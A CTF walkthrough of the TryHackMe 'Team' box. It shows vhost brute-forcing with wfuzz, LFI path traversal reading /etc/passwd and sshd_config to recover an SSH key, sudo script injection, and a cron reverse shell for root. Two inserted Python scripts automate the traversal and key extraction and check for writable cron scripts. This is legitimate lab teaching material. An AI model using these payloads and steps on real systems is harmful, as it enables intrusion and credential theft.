Team TryHackMe Walkthrough

Musyoka Ian
8 min read · Mar 6, 2021

Hello guys, back again with another walkthrough. This time we'll be tackling Team from TryHackMe, a beginner-friendly box that teaches the importance of doing your enumeration well. It starts off by finding a virtual host (vhost) that leads to a dead end (a Bootstrap-themed webpage). We brute-force subdomains using wfuzz and find one more vhost, which is vulnerable to path traversal and Local File Inclusion (LFI). Fuzzing for common files through the LFI, we notice that an SSH private key has been hidden in plain sight inside the sshd_config file. We download the key and use it to log into the box as the user Dale. Next we exploit a poorly coded bash script to escalate our privileges to the second user, Gyles, and then edit a file that is executed by a cron job to get root on the box. A really nice box; thanks to its creator, dalemazza. Without further ado, let's jump in.

As always we are going to start with an nmap scan of the box to find the ports that are open

Looking at the result you can see that we have three ports open: FTP, SSH and HTTP.

There isn't much information output by nmap concerning FTP, but to be thorough I always check for anonymous login.

As you can see in the screenshot below, anonymous login isn't allowed, but we may come back and enumerate FTP if we ever get valid credentials. SSH requires valid credentials too, and the older SSH server version that had a username enumeration vulnerability has been obsolete for some time and is probably no longer in use, so we'll keep SSH in our back pocket as well. I started by enumerating HTTP, since HTTP has by far the biggest attack surface.

Opening the web page in Mozilla Firefox, we get the Apache default page.

The first thing I always do is check the source of the page.

Looking at the source code above, you can see that the developer added a non-standard line to the default page, and that line contains a hostname. I added the hostname to my hosts file

and navigated to the web page using that hostname. Looking at the screenshot below, we get a different web page,

meaning name-based virtual hosting is enabled: the server picks the site from the Host header, so the same IP can serve several different web roots. I first left gobuster running in the background. Gobuster is a directory/file and DNS brute-forcing tool written in Go; it brute-forces URIs (directories and files) as well as DNS subdomains.

I ran two separate gobusters. One for the root web page (the Apache default page)

and the second one for the virtual host (team.thm).

While both gobusters were running in the background, I enumerated the team.thm host manually. First I looked at the source code of the web application, but nothing was out of the ordinary.

Looking at the robots.txt file, however, it exposed a potential username for one of the users.

Seeing this, I decided to use that username and try an SSH brute-force with hydra using the rockyou wordlist.

While all of these tasks were running in the background I had hit a dead end: the virtual host's web page was just a default Bootstrap theme. But since the server uses virtual hosts, I decided to brute-force subdomains. The tool I normally use for this is wfuzz, since I'm accustomed to it. Note that this is not a DNS brute-force: every request goes to the same IP and only the Host header changes, so it also finds vhosts that have no DNS record at all. The command used to brute-force subdomains is

wfuzz -c --hw 977 -u http://team.thm -H "Host: FUZZ.team.thm" -w ~/Desktop/git/SecLists/Discovery/DNS/subdomains-top1million-5000.txt

Here --hw 977 hides every response with 977 words, which is what the server returns for a Host value it does not recognise (the default vhost), so only responses of a different size show up in the output.

Looking at the result from wfuzz we get one extra virtual host, which I added to my hosts file

and tried navigating to the new virtual host in Mozilla Firefox, and voilà, we have yet another web page to enumerate.

Clicking on the placeholder link, we see that it uses some sort of include to pull in the teamshare.php file.

I intercepted the request with Burp Suite and checked for a file inclusion vulnerability. I started with a file that exists on any Linux distro, /etc/passwd, and as the screenshot below shows, I was able to include it!

We are now certain that the web application has a file inclusion vulnerability. With this vulnerability two things come to mind:

  1. We may be able to turn the LFI into remote code execution through various methods, e.g. remote file inclusion, PHP wrappers (expect://, php://input), log poisoning, a leaked phpinfo file, etc.
  2. Use the vulnerability to read sensitive files that lead to compromising the box.

First I ran Intruder (the fuzzer built into Burp Suite) with a wordlist of files commonly found on Linux systems.

I'm using Burp Suite Professional; if you are using the Community edition, Intruder is rate-limited and much slower, so I recommend wfuzz or ffuf for this kind of fuzzing.

The wordlist I used was from SecLists:

SecLists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt

After trying all the methods to get code execution from the LFI and failing, I looked through the fuzzing results and found an interesting file:

sshd_config

It contains an SSH private key for the user Dale, commented out with pound signs so that sshd ignores it.

I copied the key to my box, edited it to remove the pound signs, and gave it the right permissions (ssh refuses to use a private key that is readable by other users) with the command

chmod 600 dale.key
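Both of the steps above (fuzzing the include parameter for readable files and recovering the commented-out key) as one script, added here as an example; it is not the walkthrough's own code. It decides that a file was really included from its contents rather than from the HTTP status, tries an absolute path and then ../ chains of increasing depth, strips the pound signs from a PEM block found in the fetched config and writes it with mode 0600. The include being prefixed with a `pages/` directory under the web root, the traversal depth, the file contents and the obviously fake key material are constructed assumptions so that it runs offline.

```python
"""LFI probing by content signature, then recovery of a key hidden in sshd_config comments.

Added example, not the walkthrough's code. The fake include target, its web root
prefix and the files it serves (including the fake key) are constructed.
"""
from __future__ import annotations

import os
import posixpath
import re
import tempfile
from typing import Callable, Iterator

Fetcher = Callable[[str], bytes]   # takes the value sent in the include parameter, returns the body

# A file only counts as included when something that could only come from that file shows up.
SIGNATURES: dict[str, re.Pattern[bytes]] = {
    "/etc/passwd": re.compile(rb"^root:[^:]*:0:0:", re.M),
    "/etc/ssh/sshd_config": re.compile(rb"^#?\s*(PermitRootLogin|PasswordAuthentication|AuthorizedKeysFile)\b", re.M),
    "/proc/self/cmdline": re.compile(rb"apache2|httpd|php"),
}
PRIVATE_KEY = re.compile(rb"-----BEGIN [A-Z ]*PRIVATE KEY-----")


def traversal_payloads(path: str, max_depth: int = 6) -> Iterator[str]:
    """Absolute path first (enough for a bare include()), then ../ chains of growing depth."""
    yield path
    for depth in range(1, max_depth + 1):
        yield "../" * depth + path.lstrip("/")


def probe_files(fetch: Fetcher, signatures: dict[str, re.Pattern[bytes]],
                max_depth: int = 6) -> dict[str, tuple[str, bytes]]:
    """Map each file that was really included to (the payload that worked, the body)."""
    found: dict[str, tuple[str, bytes]] = {}
    for path, sig in signatures.items():
        for payload in traversal_payloads(path, max_depth):
            body = fetch(payload)
            if sig.search(body):               # status codes lie on LFI pages; trust the content
                found[path] = (payload, body)
                break
    return found


def extract_commented_key(text: bytes) -> str | None:
    """Pull a PEM private key out of a file where every key line was prefixed with '#'."""
    lines: list[str] = []
    for raw in text.splitlines():
        line = raw.lstrip(b"#").strip()        # drop the pound signs and surrounding whitespace
        if not lines and not PRIVATE_KEY.match(line):
            continue                           # not inside the key block yet
        lines.append(line.decode("ascii", "replace"))
        if line.startswith(b"-----END"):
            return "\n".join(lines) + "\n"
    return None                                # no complete BEGIN/END pair


def save_key(key: str, path: str) -> int:
    """Write the key with mode 0600 (the `chmod 600 dale.key` step) and return the resulting mode."""
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, "w") as f:
        f.write(key)
    os.chmod(path, 0o600)                      # O_CREAT's mode is umask-masked and ignored on existing files
    return os.stat(path).st_mode & 0o777


# --- constructed stand-in for the vulnerable page so the example runs offline (assumption) ---
_INCLUDE_PREFIX = "/var/www/dev/pages/"       # assumed: include("pages/" . $_GET["page"])
_FILES = {
    "/etc/passwd": b"root:x:0:0:root:/root:/bin/bash\ndale:x:1000:1000::/home/dale:/bin/bash\n",
    "/etc/ssh/sshd_config": b"\n".join([
        b"Port 22",
        b"PermitRootLogin no",
        b"#-----BEGIN RSA PRIVATE KEY-----",
        b"#MIIEFAKEKEYMATERIALFAKEKEYMATERIALFAKEKEYMATERIALFAKEKEYMATERIAL",   # constructed, not a real key
        b"#FAKEKEYMATERIALFAKEKEYMATERIALFAKEKEYMATERIALFAKEKEYMATERIAL==",
        b"#-----END RSA PRIVATE KEY-----",
        b"PasswordAuthentication no",
    ]) + b"\n",
}


def fake_fetch(payload: str) -> bytes:
    """Resolves the parameter the way a prefixed PHP include() would and returns the file or a warning."""
    resolved = posixpath.normpath(_INCLUDE_PREFIX + payload)
    return _FILES.get(resolved, b"<html>Warning: include(): failed to open stream</html>")


def demo() -> dict[str, object]:
    """Probe, recover the key, save it with 0600, and return the pieces worth checking."""
    found = probe_files(fake_fetch, SIGNATURES)
    key = extract_commented_key(found["/etc/ssh/sshd_config"][1]) if "/etc/ssh/sshd_config" in found else None
    mode = None
    if key:
        with tempfile.TemporaryDirectory() as d:
            mode = save_key(key, os.path.join(d, "dale.key"))
    return {"found": {p: payload for p, (payload, _) in found.items()}, "key": key, "mode": mode}


if __name__ == "__main__":
    print(demo())
```

Against a real target, replace `fake_fetch` with a function that sends the payload in the include parameter and returns the response body; the signature table is the part worth extending, because a 200 with an empty or error body is exactly what a failed include looks like.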

And tried logging into the box using the key

Looking at the screenshot above, we have a shell on the box.

Looking at the user's home directory we have the users.txt file, which we can submit to TryHackMe to get the points.

Running sudo -l, we see that we can run a particular bash script as the user Gyles.

Looking at the script, we see three possible places where we can inject system commands.

I injected into the error variable, since that variable is passed directly to a system call.

Sweet, now we have a shell as the gyles user. Looking at the user's home directory, we see that the author left .bash_history behind, meaning we can trace what the author did while creating the box.

Looking through the file, we see a file in /usr/local/share called main_backup.sh being edited.

We also see some mention of crontabs, meaning there might be a cron job running.

Looking at the file's permissions, we see that it is writable only by root and members of the admin group, and the gyles user is in the admin group, as seen in the screenshot below, so we can modify the file's contents. A script that root executes but that a non-root group can write is exactly the misconfiguration to look for.

Opening the file in vim, we see that it's a bash script that copies some backups. I edited the file and added a reverse shell to it, since I knew a cron job was executing it.

Next I set up a netcat listener

and waited for a shell. After a few seconds I got a callback.

We are the root user! Looking at root's home directory, we have the root flag.

I'd recommend always running linpeas, since it makes your job easier as a pentester or CTF player by doing all the privilege escalation checks for you.

Looking at the screenshot below, we see that it found a writable bash script.

We also see the process

/bin/bash /usr/local/bin/main_backup.sh

being executed by root through cron, which confirms the privilege escalation path.
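The check linpeas is doing here, written out as an added example that is neither linpeas nor anything from the box: parse /etc/crontab-style lines, work out which script each command actually runs (so that `/bin/bash /usr/local/bin/main_backup.sh` resolves to the script rather than the interpreter), and test the mode bits against the uid and group list of the account you hold. The sample crontab text, the temporary script it inspects and the `rotate_logs.sh` entry are constructed.

```python
"""Find cron-executed scripts that a given non-root identity can modify.

Added example; not linpeas and not the box's files. The crontab text and the
temporary script in demo() are constructed so the check runs anywhere.
"""
from __future__ import annotations

import os
import shlex
import stat
import tempfile
from typing import Iterable

INTERPRETERS = {"bash", "sh", "dash", "zsh", "python", "python3", "perl", "php", "env"}


def script_from_command(command: str) -> str | None:
    """Absolute path of the script a cron command runs, or None when it cannot be determined."""
    try:
        argv = shlex.split(command)
    except ValueError:
        return None
    for tok in argv:
        if os.path.basename(tok) in INTERPRETERS or tok.startswith("-"):
            continue                                   # skip the interpreter and its flags
        return tok if tok.startswith("/") else None    # relative paths depend on cron's cwd: unknown
    return None


def parse_system_crontab(text: str) -> list[tuple[str, str]]:
    """(user, command) pairs from /etc/crontab or /etc/cron.d lines; env lines and comments skipped."""
    entries: list[tuple[str, str]] = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):                       # @reboot / @daily: a single schedule field
            parts = line.split(None, 2)
        else:                                          # five schedule fields, then user, then command
            parts = line.split(None, 6)
        if "=" in parts[0]:                            # PATH=..., SHELL=... assignments
            continue
        if len(parts) < (3 if line.startswith("@") else 7):
            continue
        entries.append((parts[-2], parts[-1]))
    return entries


def writable_by(path: str, uid: int, gids: Iterable[int]) -> bool:
    """Can an identity with this uid and these gids write the file in place?"""
    try:
        st = os.stat(path)
    except OSError:
        return False
    if uid == 0:
        return True
    if st.st_uid == uid and st.st_mode & stat.S_IWUSR:
        return True
    if st.st_gid in set(gids) and st.st_mode & stat.S_IWGRP:   # the admin-group case from the box
        return True
    return bool(st.st_mode & stat.S_IWOTH)


def writable_cron_scripts(crontab_text: str, uid: int, gids: Iterable[int]) -> list[tuple[str, str]]:
    """(cron user, script) for every entry whose script the given identity can edit."""
    gids = set(gids)
    hits: list[tuple[str, str]] = []
    for user, command in parse_system_crontab(crontab_text):
        script = script_from_command(command)
        if script and writable_by(script, uid, gids):
            hits.append((user, script))
    return hits


def demo() -> tuple[list[tuple[str, str]], list[tuple[str, str]]]:
    """Group-writable backup script checked as a different uid that shares its group, then fixed."""
    with tempfile.TemporaryDirectory() as d:
        script = os.path.join(d, "main_backup.sh")                   # constructed stand-in
        with open(script, "w") as f:
            f.write("#!/bin/bash\ncp -r /var/www/ /var/backups/\n")
        st = os.stat(script)
        other_uid, shared_gid = st.st_uid + 1000, st.st_gid
        crontab = (
            "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\n"
            "# m h dom mon dow user command\n"
            f"*/2 * * * * root /bin/bash {script}\n"
            "@reboot root /usr/local/sbin/rotate_logs.sh\n"           # constructed; not expected to exist
        )
        os.chmod(script, 0o664)                                      # root + admin group writable
        before = writable_cron_scripts(crontab, other_uid, {shared_gid})
        os.chmod(script, 0o644)                                      # the fix: owner-only write
        after = writable_cron_scripts(crontab, other_uid, {shared_gid})
    return before, after


if __name__ == "__main__":
    print(demo())
```

On a real box feed it /etc/crontab and the files under /etc/cron.d together with `os.getuid()` and `os.getgroups()`; a writable parent directory (which lets you replace the script rather than edit it) is a second case worth adding to `writable_by`.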

If you liked the walkthrough, be sure to clap for me down below, and don't forget to follow me so that you don't miss any upcoming articles. That's it for now; till next time, goodbye!
